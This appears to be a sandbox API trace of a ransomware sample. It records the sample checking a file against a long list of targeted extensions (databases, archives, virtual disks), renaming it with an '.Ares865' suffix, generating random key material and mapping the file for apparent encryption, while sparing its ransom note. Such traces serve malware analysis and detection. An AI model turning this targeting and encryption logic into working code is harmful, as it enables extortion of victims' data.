(lpString1="MAPIR.DLL.trx_dll", lpString2=".dll") returned 1 [0087.540] lstrlenW (lpString=".lnk") returned 4 [0087.540] lstrcmpiW (lpString1="MAPIR.DLL.trx_dll", lpString2=".lnk") returned 1 [0087.540] lstrlenW (lpString=".ini") returned 4 [0087.540] lstrcmpiW (lpString1="MAPIR.DLL.trx_dll", lpString2=".ini") returned 1 [0087.540] lstrlenW (lpString=".sys") returned 4 [0087.540] lstrcmpiW (lpString1="MAPIR.DLL.trx_dll", lpString2=".sys") returned 1 [0087.540] lstrlenW (lpString="MAPIR.DLL.trx_dll") returned 17 [0087.540] lstrlenW (lpString="bak") returned 3 [0087.540] lstrcmpiW (lpString1="dll", lpString2="bak") returned 1 [0087.540] lstrlenW (lpString="ba_") returned 3 [0087.540] lstrcmpiW (lpString1="dll", lpString2="ba_") returned 1 [0087.540] lstrlenW (lpString="dbb") returned 3 [0087.540] lstrcmpiW (lpString1="dll", lpString2="dbb") returned 1 [0087.540] lstrlenW (lpString="vmdk") returned 4 [0087.540] lstrcmpiW (lpString1="_dll", lpString2="vmdk") returned -1 [0087.540] lstrlenW (lpString="rar") returned 3 [0087.540] lstrcmpiW (lpString1="dll", lpString2="rar") returned -1 [0087.540] lstrlenW (lpString="zip") returned 3 [0087.540] lstrcmpiW (lpString1="dll", lpString2="zip") returned -1 [0087.540] lstrlenW (lpString="tgz") returned 3 [0087.540] lstrcmpiW (lpString1="dll", lpString2="tgz") returned -1 [0087.540] lstrlenW (lpString="vbox") returned 4 [0087.540] lstrcmpiW (lpString1="_dll", lpString2="vbox") returned -1 [0087.540] lstrlenW (lpString="vdi") returned 3 [0087.540] lstrcmpiW (lpString1="dll", lpString2="vdi") returned -1 [0087.540] lstrlenW (lpString="vhd") returned 3 [0087.540] lstrcmpiW (lpString1="dll", lpString2="vhd") returned -1 [0087.540] lstrlenW (lpString="vhdx") returned 4 [0087.540] lstrcmpiW (lpString1="_dll", lpString2="vhdx") returned -1 [0087.540] lstrlenW (lpString="avhd") returned 4 [0087.540] lstrcmpiW (lpString1="_dll", lpString2="avhd") returned -1 [0087.540] lstrlenW (lpString="db") returned 2 [0087.540] lstrcmpiW (lpString1="ll", lpString2="db") returned 1 [0087.541] lstrlenW (lpString="db2") returned 3 [0087.541] lstrcmpiW (lpString1="dll", lpString2="db2") returned 1 [0087.541] lstrlenW (lpString="db3") returned 3 [0087.541] lstrcmpiW (lpString1="dll", lpString2="db3") returned 1 [0087.541] lstrlenW (lpString="dbf") returned 3 [0087.541] lstrcmpiW (lpString1="dll", lpString2="dbf") returned 1 [0087.541] lstrlenW (lpString="mdf") returned 3 [0087.541] lstrcmpiW (lpString1="dll", lpString2="mdf") returned -1 [0087.541] lstrlenW (lpString="mdb") returned 3 [0087.541] lstrcmpiW (lpString1="dll", lpString2="mdb") returned -1 [0087.541] lstrlenW (lpString="sql") returned 3 [0087.541] lstrcmpiW (lpString1="dll", lpString2="sql") returned -1 [0087.541] lstrlenW (lpString="sqlite") returned 6 [0087.541] lstrcmpiW (lpString1="rx_dll", lpString2="sqlite") returned -1 [0087.541] lstrlenW (lpString="sqlite3") returned 7 [0087.541] lstrcmpiW (lpString1="trx_dll", lpString2="sqlite3") returned 1 [0087.541] lstrlenW (lpString="sqlitedb") returned 8 [0087.541] lstrcmpiW (lpString1=".trx_dll", lpString2="sqlitedb") returned -1 [0087.541] lstrlenW (lpString="xml") returned 3 [0087.541] lstrcmpiW (lpString1="dll", lpString2="xml") returned -1 [0087.541] lstrlenW (lpString="$er") returned 3 [0087.541] lstrcmpiW (lpString1="dll", lpString2="$er") returned 1 [0087.541] lstrlenW (lpString="4dd") returned 3 [0087.541] lstrcmpiW (lpString1="dll", lpString2="4dd") returned 1 [0087.541] lstrlenW (lpString="4dl") returned 3 [0087.541] lstrcmpiW (lpString1="dll", lpString2="4dl") returned 1 [0087.541] lstrlenW (lpString="^^^") returned 3 [0087.541] lstrcmpiW (lpString1="dll", lpString2="^^^") returned 1 [0087.542] lstrlenW (lpString="abs") returned 3 [0087.542] lstrcmpiW (lpString1="dll", lpString2="abs") returned 1 [0087.542] lstrlenW (lpString="abx") returned 3 [0087.542] lstrcmpiW (lpString1="dll", lpString2="abx") returned 1 [0087.542] lstrlenW (lpString="accdb") returned 5 [0087.542] lstrcmpiW (lpString1="x_dll", lpString2="accdb") returned 1 [0087.542] lstrlenW (lpString="accdc") returned 5 [0087.542] lstrcmpiW (lpString1="x_dll", lpString2="accdc") returned 1 [0087.542] lstrlenW (lpString="accde") returned 5 [0087.542] lstrcmpiW (lpString1="x_dll", lpString2="accde") returned 1 [0087.542] lstrlenW (lpString="accdr") returned 5 [0087.542] lstrcmpiW (lpString1="x_dll", lpString2="accdr") returned 1 [0087.542] lstrlenW (lpString="accdt") returned 5 [0087.542] lstrcmpiW (lpString1="x_dll", lpString2="accdt") returned 1 [0087.542] lstrlenW (lpString="accdw") returned 5 [0087.542] lstrcmpiW (lpString1="x_dll", lpString2="accdw") returned 1 [0087.542] lstrlenW (lpString="accft") returned 5 [0087.542] lstrcmpiW (lpString1="x_dll", lpString2="accft") returned 1 [0087.542] lstrlenW (lpString="adb") returned 3 [0087.542] lstrcmpiW (lpString1="dll", lpString2="adb") returned 1 [0087.542] lstrlenW (lpString="adb") returned 3 [0087.542] lstrcmpiW (lpString1="dll", lpString2="adb") returned 1 [0087.542] lstrlenW (lpString="ade") returned 3 [0087.542] lstrcmpiW (lpString1="dll", lpString2="ade") returned 1 [0087.542] lstrlenW (lpString="adf") returned 3 [0087.542] lstrcmpiW (lpString1="dll", lpString2="adf") returned 1 [0087.542] lstrlenW (lpString="adn") returned 3 [0087.542] lstrcmpiW (lpString1="dll", lpString2="adn") returned 1 [0087.542] lstrlenW (lpString="adp") returned 3 [0087.542] lstrcmpiW (lpString1="dll", lpString2="adp") returned 1 [0087.542] lstrlenW (lpString="alf") returned 3 [0087.542] lstrcmpiW (lpString1="dll", lpString2="alf") returned 1 [0087.542] lstrlenW (lpString="ask") returned 3 [0087.542] lstrcmpiW (lpString1="dll", lpString2="ask") returned 1 [0087.542] lstrlenW (lpString="btr") returned 3 [0087.542] lstrcmpiW (lpString1="dll", lpString2="btr") returned 1 [0087.542] lstrlenW (lpString="cat") returned 3 [0087.542] lstrcmpiW (lpString1="dll", lpString2="cat") returned 1 [0087.543] lstrlenW (lpString="cdb") returned 3 [0087.543] lstrcmpiW (lpString1="dll", lpString2="cdb") returned 1 [0087.543] lstrlenW (lpString="ckp") returned 3 [0087.543] lstrcmpiW (lpString1="dll", lpString2="ckp") returned 1 [0087.543] lstrlenW (lpString="cma") returned 3 [0087.543] lstrcmpiW (lpString1="dll", lpString2="cma") returned 1 [0087.543] lstrlenW (lpString="cpd") returned 3 [0087.543] lstrcmpiW (lpString1="dll", lpString2="cpd") returned 1 [0087.543] lstrlenW (lpString="dacpac") returned 6 [0087.543] lstrcmpiW (lpString1="rx_dll", lpString2="dacpac") returned 1 [0087.543] lstrlenW (lpString="dad") returned 3 [0087.543] lstrcmpiW (lpString1="dll", lpString2="dad") returned 1 [0087.543] lstrlenW (lpString="dadiagrams") returned 10 [0087.543] lstrcmpiW (lpString1="LL.trx_dll", lpString2="dadiagrams") returned 1 [0087.543] lstrlenW (lpString="daschema") returned 8 [0087.543] lstrcmpiW (lpString1=".trx_dll", lpString2="daschema") returned -1 [0087.543] lstrlenW (lpString="db-journal") returned 10 [0087.543] lstrcmpiW (lpString1="LL.trx_dll", lpString2="db-journal") returned 1 [0087.543] lstrlenW (lpString="db-shm") returned 6 [0087.543] lstrcmpiW (lpString1="rx_dll", lpString2="db-shm") returned 1 [0087.543] lstrlenW (lpString="db-wal") returned 6 [0087.543] lstrcmpiW (lpString1="rx_dll", lpString2="db-wal") returned 1 [0087.543] lstrlenW (lpString="dbc") returned 3 [0087.543] lstrcmpiW (lpString1="dll", lpString2="dbc") returned 1 [0087.543] lstrlenW (lpString="dbs") returned 3 [0087.543] lstrcmpiW (lpString1="dll", lpString2="dbs") returned 1 [0087.543] lstrlenW (lpString="dbt") returned 3 [0087.543] lstrcmpiW (lpString1="dll", lpString2="dbt") returned 1 [0087.543] lstrlenW (lpString="dbv") returned 3 [0087.543] lstrcmpiW (lpString1="dll", lpString2="dbv") returned 1 [0087.543] lstrlenW (lpString="dbx") returned 3 [0087.543] lstrcmpiW (lpString1="dll", lpString2="dbx") returned 1 [0087.543] lstrlenW (lpString="dcb") returned 3 [0087.543] lstrcmpiW (lpString1="dll", lpString2="dcb") returned 1 [0087.543] lstrlenW (lpString="dct") returned 3 [0087.543] lstrcmpiW (lpString1="dll", lpString2="dct") returned 1 [0087.543] lstrlenW (lpString="dcx") returned 3 [0087.543] lstrcmpiW (lpString1="dll", lpString2="dcx") returned 1 [0087.543] lstrlenW (lpString="ddl") returned 3 [0087.544] lstrcmpiW (lpString1="dll", lpString2="ddl") returned 1 [0087.544] lstrlenW (lpString="dlis") returned 4 [0087.544] lstrcmpiW (lpString1="_dll", lpString2="dlis") returned -1 [0087.544] lstrlenW (lpString="dp1") returned 3 [0087.544] lstrcmpiW (lpString1="dll", lpString2="dp1") returned -1 [0087.544] lstrlenW (lpString="dqy") returned 3 [0087.544] lstrcmpiW (lpString1="dll", lpString2="dqy") returned -1 [0087.544] lstrlenW (lpString="dsk") returned 3 [0087.544] lstrcmpiW (lpString1="dll", lpString2="dsk") returned -1 [0087.544] lstrlenW (lpString="dsn") returned 3 [0087.544] lstrcmpiW (lpString1="dll", lpString2="dsn") returned -1 [0087.544] lstrlenW (lpString="dtsx") returned 4 [0087.544] lstrcmpiW (lpString1="_dll", lpString2="dtsx") returned -1 [0087.544] lstrlenW (lpString="dxl") returned 3 [0087.544] lstrcmpiW (lpString1="dll", lpString2="dxl") returned -1 [0087.544] lstrlenW (lpString="eco") returned 3 [0087.544] lstrcmpiW (lpString1="dll", lpString2="eco") returned -1 [0087.544] lstrlenW (lpString="ecx") returned 3 [0087.544] lstrcmpiW (lpString1="dll", lpString2="ecx") returned -1 [0087.544] lstrlenW (lpString="edb") returned 3 [0087.544] lstrcmpiW (lpString1="dll", lpString2="edb") returned -1 [0087.544] lstrlenW (lpString="epim") returned 4 [0087.544] lstrcmpiW (lpString1="_dll", lpString2="epim") returned -1 [0087.544] lstrlenW (lpString="fcd") returned 3 [0087.544] lstrcmpiW (lpString1="dll", lpString2="fcd") returned -1 [0087.544] lstrlenW (lpString="fdb") returned 3 [0087.544] lstrcmpiW (lpString1="dll", lpString2="fdb") returned -1 [0087.544] lstrlenW (lpString="fic") returned 3 [0087.544] lstrcmpiW (lpString1="dll", lpString2="fic") returned -1 [0087.544] lstrlenW (lpString="flexolibrary") returned 12 [0087.544] lstrcmpiW (lpString1=".DLL.trx_dll", lpString2="flexolibrary") returned -1 [0087.544] lstrlenW (lpString="fm5") returned 3 [0087.544] lstrcmpiW (lpString1="dll", lpString2="fm5") returned -1 [0087.544] lstrlenW (lpString="fmp") returned 3 [0087.544] lstrcmpiW (lpString1="dll", lpString2="fmp") returned -1 [0087.544] lstrlenW (lpString="fmp12") returned 5 [0087.544] lstrcmpiW (lpString1="x_dll", lpString2="fmp12") returned 1 [0087.544] lstrlenW (lpString="fmpsl") returned 5 [0087.545] lstrcmpiW (lpString1="x_dll", lpString2="fmpsl") returned 1 [0087.545] lstrlenW (lpString="fol") returned 3 [0087.545] lstrcmpiW (lpString1="dll", lpString2="fol") returned -1 [0087.545] lstrlenW (lpString="fp3") returned 3 [0087.545] lstrcmpiW (lpString1="dll", lpString2="fp3") returned -1 [0087.545] lstrlenW (lpString="fp4") returned 3 [0087.545] lstrcmpiW (lpString1="dll", lpString2="fp4") returned -1 [0087.545] lstrlenW (lpString="fp5") returned 3 [0087.545] lstrcmpiW (lpString1="dll", lpString2="fp5") returned -1 [0087.545] lstrlenW (lpString="fp7") returned 3 [0087.545] lstrcmpiW (lpString1="dll", lpString2="fp7") returned -1 [0087.545] lstrlenW (lpString="fpt") returned 3 [0087.545] lstrcmpiW (lpString1="dll", lpString2="fpt") returned -1 [0087.545] lstrlenW (lpString="frm") returned 3 [0087.545] lstrcmpiW (lpString1="dll", lpString2="frm") returned -1 [0087.545] lstrlenW (lpString="gdb") returned 3 [0087.545] lstrcmpiW (lpString1="dll", lpString2="gdb") returned -1 [0087.545] lstrlenW (lpString="gdb") returned 3 [0087.545] lstrcmpiW (lpString1="dll", lpString2="gdb") returned -1 [0087.545] lstrlenW (lpString="grdb") returned 4 [0087.545] lstrcmpiW (lpString1="_dll", lpString2="grdb") returned -1 [0087.545] lstrlenW (lpString="gwi") returned 3 [0087.545] lstrcmpiW (lpString1="dll", lpString2="gwi") returned -1 [0087.545] lstrlenW (lpString="hdb") returned 3 [0087.545] lstrcmpiW (lpString1="dll", lpString2="hdb") returned -1 [0087.545] lstrlenW (lpString="his") returned 3 [0087.545] lstrcmpiW (lpString1="dll", lpString2="his") returned -1 [0087.545] lstrlenW (lpString="ib") returned 2 [0087.545] lstrcmpiW (lpString1="ll", lpString2="ib") returned 1 [0087.545] lstrlenW (lpString="idb") returned 3 [0087.545] lstrcmpiW (lpString1="dll", lpString2="idb") returned -1 [0087.545] lstrlenW (lpString="ihx") returned 3 [0087.545] lstrcmpiW (lpString1="dll", lpString2="ihx") returned -1 [0087.545] lstrlenW (lpString="itdb") returned 4 [0087.545] lstrcmpiW (lpString1="_dll", lpString2="itdb") returned -1 [0087.545] lstrlenW (lpString="itw") returned 3 [0087.545] lstrcmpiW (lpString1="dll", lpString2="itw") returned -1 [0087.545] lstrlenW (lpString="jet") returned 3 [0087.546] lstrcmpiW (lpString1="dll", lpString2="jet") returned -1 [0087.546] lstrlenW (lpString="jtx") returned 3 [0087.546] lstrcmpiW (lpString1="dll", lpString2="jtx") returned -1 [0087.546] lstrlenW (lpString="kdb") returned 3 [0087.546] lstrcmpiW (lpString1="dll", lpString2="kdb") returned -1 [0087.546] lstrlenW (lpString="kexi") returned 4 [0087.546] lstrcmpiW (lpString1="_dll", lpString2="kexi") returned -1 [0087.546] lstrlenW (lpString="kexic") returned 5 [0087.546] lstrcmpiW (lpString1="x_dll", lpString2="kexic") returned 1 [0087.546] lstrlenW (lpString="kexis") returned 5 [0087.546] lstrcmpiW (lpString1="x_dll", lpString2="kexis") returned 1 [0087.546] lstrlenW (lpString="lgc") returned 3 [0087.546] lstrcmpiW (lpString1="dll", lpString2="lgc") returned -1 [0087.546] lstrlenW (lpString="lwx") returned 3 [0087.546] lstrcmpiW (lpString1="dll", lpString2="lwx") returned -1 [0087.546] lstrlenW (lpString="maf") returned 3 [0087.546] lstrcmpiW (lpString1="dll", lpString2="maf") returned -1 [0087.546] lstrlenW (lpString="maq") returned 3 [0087.546] lstrcmpiW (lpString1="dll", lpString2="maq") returned -1 [0087.546] lstrlenW (lpString="mar") returned 3 [0087.546] lstrcmpiW (lpString1="dll", lpString2="mar") returned -1 [0087.546] lstrlenW (lpString="marshal") returned 7 [0087.546] lstrcmpiW (lpString1="trx_dll", lpString2="marshal") returned 1 [0087.546] lstrlenW (lpString="mas") returned 3 [0087.546] lstrcmpiW (lpString1="dll", lpString2="mas") returned -1 [0087.546] lstrlenW (lpString="mav") returned 3 [0087.546] lstrcmpiW (lpString1="dll", lpString2="mav") returned -1 [0087.546] lstrlenW (lpString="maw") returned 3 [0087.546] lstrcmpiW (lpString1="dll", lpString2="maw") returned -1 [0087.546] lstrlenW (lpString="mdbhtml") returned 7 [0087.546] lstrcmpiW (lpString1="trx_dll", lpString2="mdbhtml") returned 1 [0087.546] lstrlenW (lpString="mdn") returned 3 [0087.546] lstrcmpiW (lpString1="dll", lpString2="mdn") returned -1 [0087.546] lstrlenW (lpString="mdt") returned 3 [0087.546] lstrcmpiW (lpString1="dll", lpString2="mdt") returned -1 [0087.546] lstrlenW (lpString="mfd") returned 3 [0087.546] lstrcmpiW (lpString1="dll", lpString2="mfd") returned -1 [0087.546] lstrlenW (lpString="mpd") returned 3 [0087.547] lstrcmpiW (lpString1="dll", lpString2="mpd") returned -1 [0087.547] lstrlenW (lpString="mrg") returned 3 [0087.547] lstrcmpiW (lpString1="dll", lpString2="mrg") returned -1 [0087.547] lstrlenW (lpString="mud") returned 3 [0087.547] lstrcmpiW (lpString1="dll", lpString2="mud") returned -1 [0087.547] lstrlenW (lpString="mwb") returned 3 [0087.547] lstrcmpiW (lpString1="dll", lpString2="mwb") returned -1 [0087.547] lstrlenW (lpString="myd") returned 3 [0087.547] lstrcmpiW (lpString1="dll", lpString2="myd") returned -1 [0087.547] lstrlenW (lpString="ndf") returned 3 [0087.547] lstrcmpiW (lpString1="dll", lpString2="ndf") returned -1 [0087.547] lstrlenW (lpString="nnt") returned 3 [0087.547] lstrcmpiW (lpString1="dll", lpString2="nnt") returned -1 [0087.547] lstrlenW (lpString="nrmlib") returned 6 [0087.547] lstrcmpiW (lpString1="rx_dll", lpString2="nrmlib") returned 1 [0087.547] lstrlenW (lpString="ns2") returned 3 [0087.547] lstrcmpiW (lpString1="dll", lpString2="ns2") returned -1 [0087.547] lstrlenW (lpString="ns3") returned 3 [0087.547] lstrcmpiW (lpString1="dll", lpString2="ns3") returned -1 [0087.547] lstrlenW (lpString="ns4") returned 3 [0087.547] lstrcmpiW (lpString1="dll", lpString2="ns4") returned -1 [0087.547] lstrlenW (lpString="nsf") returned 3 [0087.547] lstrcmpiW (lpString1="dll", lpString2="nsf") returned -1 [0087.547] lstrlenW (lpString="nv") returned 2 [0087.547] lstrcmpiW (lpString1="ll", lpString2="nv") returned -1 [0087.547] lstrlenW (lpString="nv2") returned 3 [0087.547] lstrcmpiW (lpString1="dll", lpString2="nv2") returned -1 [0087.547] lstrlenW (lpString="nwdb") returned 4 [0087.547] lstrcmpiW (lpString1="_dll", lpString2="nwdb") returned -1 [0087.547] lstrlenW (lpString="nyf") returned 3 [0087.547] lstrcmpiW (lpString1="dll", lpString2="nyf") returned -1 [0087.547] lstrlenW (lpString="odb") returned 3 [0087.547] lstrcmpiW (lpString1="dll", lpString2="odb") returned -1 [0087.547] lstrlenW (lpString="odb") returned 3 [0087.547] lstrcmpiW (lpString1="dll", lpString2="odb") returned -1 [0087.547] lstrlenW (lpString="oqy") returned 3 [0087.547] lstrcmpiW (lpString1="dll", lpString2="oqy") returned -1 [0087.547] lstrlenW (lpString="ora") returned 3 [0087.548] lstrcmpiW (lpString1="dll", lpString2="ora") returned -1 [0087.548] lstrlenW (lpString="orx") returned 3 [0087.548] lstrcmpiW (lpString1="dll", lpString2="orx") returned -1 [0087.548] lstrlenW (lpString="owc") returned 3 [0087.548] lstrcmpiW (lpString1="dll", lpString2="owc") returned -1 [0087.548] lstrlenW (lpString="p96") returned 3 [0087.548] lstrcmpiW (lpString1="dll", lpString2="p96") returned -1 [0087.548] lstrlenW (lpString="p97") returned 3 [0087.548] lstrcmpiW (lpString1="dll", lpString2="p97") returned -1 [0087.548] lstrlenW (lpString="pan") returned 3 [0087.548] lstrcmpiW (lpString1="dll", lpString2="pan") returned -1 [0087.548] lstrlenW (lpString="pdb") returned 3 [0087.548] lstrcmpiW (lpString1="dll", lpString2="pdb") returned -1 [0087.548] lstrlenW (lpString="pdm") returned 3 [0087.548] lstrcmpiW (lpString1="dll", lpString2="pdm") returned -1 [0087.548] lstrlenW (lpString="pnz") returned 3 [0087.548] lstrcmpiW (lpString1="dll", lpString2="pnz") returned -1 [0087.548] lstrlenW (lpString="qry") returned 3 [0087.548] lstrcmpiW (lpString1="dll", lpString2="qry") returned -1 [0087.548] lstrlenW (lpString="qvd") returned 3 [0087.548] lstrcmpiW (lpString1="dll", lpString2="qvd") returned -1 [0087.548] lstrlenW (lpString="rbf") returned 3 [0087.548] lstrcmpiW (lpString1="dll", lpString2="rbf") returned -1 [0087.548] lstrlenW (lpString="rctd") returned 4 [0087.548] lstrcmpiW (lpString1="_dll", lpString2="rctd") returned -1 [0087.548] lstrlenW (lpString="rod") returned 3 [0087.548] lstrcmpiW (lpString1="dll", lpString2="rod") returned -1 [0087.548] lstrlenW (lpString="rodx") returned 4 [0087.548] lstrcmpiW (lpString1="_dll", lpString2="rodx") returned -1 [0087.548] lstrlenW (lpString="rpd") returned 3 [0087.548] lstrcmpiW (lpString1="dll", lpString2="rpd") returned -1 [0087.548] lstrlenW (lpString="rsd") returned 3 [0087.548] lstrcmpiW (lpString1="dll", lpString2="rsd") returned -1 [0087.548] lstrlenW (lpString="sas7bdat") returned 8 [0087.548] lstrcmpiW (lpString1=".trx_dll", lpString2="sas7bdat") returned -1 [0087.548] lstrlenW (lpString="sbf") returned 3 [0087.548] lstrcmpiW (lpString1="dll", lpString2="sbf") returned -1 [0087.548] lstrlenW (lpString="scx") returned 3 [0087.549] lstrcmpiW (lpString1="dll", lpString2="scx") returned -1 [0087.549] lstrlenW (lpString="sdb") returned 3 [0087.549] lstrcmpiW (lpString1="dll", lpString2="sdb") returned -1 [0087.549] lstrlenW (lpString="sdc") returned 3 [0087.549] lstrcmpiW (lpString1="dll", lpString2="sdc") returned -1 [0087.549] lstrlenW (lpString="sdf") returned 3 [0087.549] lstrcmpiW (lpString1="dll", lpString2="sdf") returned -1 [0087.549] lstrlenW (lpString="sis") returned 3 [0087.549] lstrcmpiW (lpString1="dll", lpString2="sis") returned -1 [0087.549] lstrlenW (lpString="spq") returned 3 [0087.549] lstrcmpiW (lpString1="dll", lpString2="spq") returned -1 [0087.549] lstrlenW (lpString="te") returned 2 [0087.549] lstrcmpiW (lpString1="ll", lpString2="te") returned -1 [0087.549] lstrlenW (lpString="teacher") returned 7 [0087.549] lstrcmpiW (lpString1="trx_dll", lpString2="teacher") returned 1 [0087.549] lstrlenW (lpString="tmd") returned 3 [0087.549] lstrcmpiW (lpString1="dll", lpString2="tmd") returned -1 [0087.549] lstrlenW (lpString="tps") returned 3 [0087.549] lstrcmpiW (lpString1="dll", lpString2="tps") returned -1 [0087.549] lstrlenW (lpString="trc") returned 3 [0087.549] lstrcmpiW (lpString1="dll", lpString2="trc") returned -1 [0087.549] lstrlenW (lpString="trc") returned 3 [0087.549] lstrcmpiW (lpString1="dll", lpString2="trc") returned -1 [0087.549] lstrlenW (lpString="trm") returned 3 [0087.549] lstrcmpiW (lpString1="dll", lpString2="trm") returned -1 [0087.549] lstrlenW (lpString="udb") returned 3 [0087.549] lstrcmpiW (lpString1="dll", lpString2="udb") returned -1 [0087.549] lstrlenW (lpString="udl") returned 3 [0087.549] lstrcmpiW (lpString1="dll", lpString2="udl") returned -1 [0087.549] lstrlenW (lpString="usr") returned 3 [0087.549] lstrcmpiW (lpString1="dll", lpString2="usr") returned -1 [0087.549] lstrlenW (lpString="v12") returned 3 [0087.549] lstrcmpiW (lpString1="dll", lpString2="v12") returned -1 [0087.549] lstrlenW (lpString="vis") returned 3 [0087.549] lstrcmpiW (lpString1="dll", lpString2="vis") returned -1 [0087.549] lstrlenW (lpString="vpd") returned 3 [0087.549] lstrcmpiW (lpString1="dll", lpString2="vpd") returned -1 [0087.549] lstrlenW (lpString="vvv") returned 3 [0087.550] lstrcmpiW (lpString1="dll", lpString2="vvv") returned -1 [0087.550] lstrlenW (lpString="wdb") returned 3 [0087.550] lstrcmpiW (lpString1="dll", lpString2="wdb") returned -1 [0087.550] lstrlenW (lpString="wmdb") returned 4 [0087.550] lstrcmpiW (lpString1="_dll", lpString2="wmdb") returned -1 [0087.550] lstrlenW (lpString="wrk") returned 3 [0087.550] lstrcmpiW (lpString1="dll", lpString2="wrk") returned -1 [0087.550] lstrlenW (lpString="xdb") returned 3 [0087.550] lstrcmpiW (lpString1="dll", lpString2="xdb") returned -1 [0087.550] lstrlenW (lpString="xld") returned 3 [0087.550] lstrcmpiW (lpString1="dll", lpString2="xld") returned -1 [0087.550] lstrlenW (lpString="xmlff") returned 5 [0087.550] lstrcmpiW (lpString1="x_dll", lpString2="xmlff") returned -1 [0087.550] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\MAPIR.DLL.trx_dll.Ares865") returned 77 [0087.550] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\MAPIR.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\mapir.dll.trx_dll"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\MAPIR.DLL.trx_dll.Ares865" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\mapir.dll.trx_dll.ares865"), dwFlags=0x1) returned 1 [0087.551] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\MAPIR.DLL.trx_dll.Ares865" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\mapir.dll.trx_dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0087.552] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=302944) returned 1 [0087.552] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0087.552] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0087.552] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0087.552] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0087.553] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0087.553] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0087.553] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4a260, lpName=0x0) returned 0x15c [0087.554] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4a260) returned 0x420000 [0087.571] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0087.572] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0087.572] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0087.572] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0087.572] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0087.572] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0087.572] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0087.572] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0087.573] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0087.573] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0087.573] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0087.573] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0087.573] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0087.573] UnmapViewOfFile (lpBaseAddress=0x420000) returned 1 [0087.576] CloseHandle (hObject=0x15c) returned 1 [0087.576] CloseHandle (hObject=0x118) returned 1 [0087.576] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0087.576] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0087.576] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0087.577] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa27f6800, ftCreationTime.dwHighDateTime=0x1cac809, ftLastAccessTime.dwLowDateTime=0xeee1cd90, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xa27f6800, ftLastWriteTime.dwHighDateTime=0x1cac809, nFileSizeHigh=0x0, nFileSizeLow=0xc160, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MOR6INT.REST.trx_dll", cAlternateFileName="MOR6IN~1.TRX")) returned 1 [0087.577] lstrcmpiW (lpString1="MOR6INT.REST.trx_dll", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0087.577] lstrcmpiW (lpString1="MOR6INT.REST.trx_dll", lpString2="aoldtz.exe") returned 1 [0087.577] lstrcmpiW (lpString1="MOR6INT.REST.trx_dll", lpString2=".") returned 1 [0087.577] lstrcmpiW (lpString1="MOR6INT.REST.trx_dll", lpString2="..") returned 1 